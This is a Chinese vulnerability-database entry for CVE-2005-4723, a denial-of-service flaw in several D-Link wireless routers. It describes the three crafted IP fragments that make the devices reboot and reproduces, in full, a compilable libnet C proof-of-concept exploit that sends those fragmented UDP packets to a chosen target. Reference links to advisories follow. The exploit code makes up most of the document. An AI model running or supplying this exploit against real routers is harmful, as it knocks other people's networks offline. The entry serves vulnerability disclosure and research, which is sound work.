多个D-Link产品IP报文重组拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109756 漏洞类型 设计错误
发布时间 2006-02-14 更新时间 2006-03-01
CVE编号 CVE-2005-4723 CNNVD-ID CNNVD-200512-848
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1496
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-848
|漏洞详情
D-Link是台湾友讯集团所创立的网络公司,致力于局域网、宽带网、无线网、语音网及相关网络设备的研发、生产和行销。D-Link的多个无线接入路由器存在拒绝服务漏洞,远程攻击者可能利用此漏洞对设备进行拒绝服务攻击。如果攻击者发送3个连续的如下碎片UDP报文的话就会导致设备重启:所有报文的IP首部中必须有相同的IdentificationNumber。报文1:必须将MORE_FRAGMENTS标记位设置为1(IP_MF)碎片偏移=0报文的有效部分大小为8个字节。攻击代码中使用了空字节。报文2:将MORE_FRAGMENTS标记设置为1(0x2002)碎片偏移=16有效部分8个字节长。报文3:将MORE_FRAGMENTS标记设置为0(0x0003)碎片偏移=24有效部分8个字节长。收到上述报文后受影响路由器会立即终止所有的当前连接。DI-524需要大约1分钟可以重启恢复连接,DI-624需要大约30秒可以重启。
|漏洞EXP
/*
 *  
 * Aaron Portnoy
 *  
 * silc.thunkers.net, thunkers
 *  
 * D-Link Wireless Access Point
 * Fragmented UDP DoS Proof of Concept 
 *  
 *
 * gcc -o dlink_dos dlink_dos.c -lnet -Wall 
 *    
 */     
    
#include <libnet.h>
    
#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111
    
void usage (char *name)
{   
    fprintf (stderr,
             "Usage: %s -s <source ip> -d <destination ip>\ 
			-a <source port> -b <destination port> \n",
             name);
        
    exit (EXIT_FAILURE);
}
    
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
                u_short dPRT, int count)
{                           

    libnet_t *l = NULL;
    libnet_ptag_t udp = 0;
    libnet_ptag_t ip = 0;
    
    char errbuf[LIBNET_ERRBUF_SIZE];
    char *payload = NULL;
    u_short payload_s = 0, src_prt, dst_prt;
    u_long src_ip, dst_ip;
    int c, frag;
        
    if (!device)
        device = DEVICE;
        
    l = libnet_init (LIBNET_RAW4, device, errbuf);

    if (!l) {
        fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
        exit (EXIT_FAILURE);
    }
	
    src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

    dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

    src_prt = sPRT ? sPRT : SRC_PRT;

    dst_prt = dPRT ? dPRT : DST_PRT;

    if (count == 1) {
        payload = "\0\0\0\0\0\0\0\0";
        payload_s = 8;
    }

    udp = libnet_build_udp (src_prt,
                            dst_prt,
                            (LIBNET_UDP_H + payload_s) * 2,
                            0, (unsigned char *)payload, payload_s, l, udp);

    if (udp == -1) {
        fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    switch (count) {

    case 1:
        frag = IP_MF;
        break;

    case 2:
        frag = 0x2002;
        break;

    case 3:
        frag = 0x0003;
        break;
    }

    ip = libnet_build_ipv4 (20,
                            0,
                            1800,
                            frag,
                            128,
                            IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);

    if (ip == -1) {
        fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    c = libnet_write (l);

    if (c == -1) {
        fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    printf ("Wrote UDP packet; check the wire.\n");

    libnet_destroy (l);

    return (EXIT_SUCCESS);

}

int main (int argc, char **argv)
{

    int i;
    char *pDST, *pSRC, *device;
    u_short dPRT = 0;
    u_short sPRT = 0;

    pDST = pSRC = device = NULL;

    while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
        switch (i) {
        case 'D':
            device = optarg;
            break;
        case 'd':
            pDST = optarg;
            break;
        case 's':
            pSRC = optarg;
            break;
        case 'a':
            sPRT = atoi (optarg);
            break;
        case 'b':
            dPRT = atoi (optarg);
            break;
        case 'h':
            usage (argv[0]);
            break;
        }
    }

    printf ("\n----------------------------------\n");
    printf ("      -=    D-Link DoS PoC     =-\n");
    printf ("          Aaron Portnoy\n");
    printf ("       deft () thunkers ! net     \n");
    printf ("   silc.thunkers.net, thunkers\n");
    printf ("----------------------------------\n");


    device ? printf ("\nDevice: \t%s\n", device) :
        printf ("\nDevice: \t%s\n", DEVICE);

    pSRC ? printf ("SRC IP: \t%s\n", pSRC) :
        printf ("SRC IP: \t%s\n", SRC_IP);

    pDST ? printf ("DST IP: \t%s\n", pDST) :
        printf ("DST IP: \t%s\n", DST_IP);

    sPRT ? printf ("SPort: \t\t%d\n", sPRT) :
        printf ("SPort: \t\t%d\n", SRC_PRT);

    dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
        printf ("DPort: \t\t%d\n\n", DST_PRT);

    for (i = 1; i <= 3; i++)
        gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
    printf ("\n");

    return (EXIT_SUCCESS);
}

// milw0rm.com [2006-02-14]
|参考资料

来源:MISC
链接:http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt
来源:BID
名称:16621
链接:http://www.securityfocus.com/bid/16621
来源:VUPEN
名称:ADV-2006-0563
链接:http://www.frsirt.com/english/advisories/2006/0563
来源:SECUNIA
名称:18833
链接:http://secunia.com/advisories/18833
来源:FULLDISC
名称:20060210[thunkers.net]D-LinkFragmentedUDPDoSVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0188.html
来源:XF
名称:dlink-udp-fragment-dos(24631)
链接:http://xforce.iss.net/xforce/xfdb/24631
来源:NSFOCUS
名称:8496
链接:http://www.nsfocus.net/vulndb/8496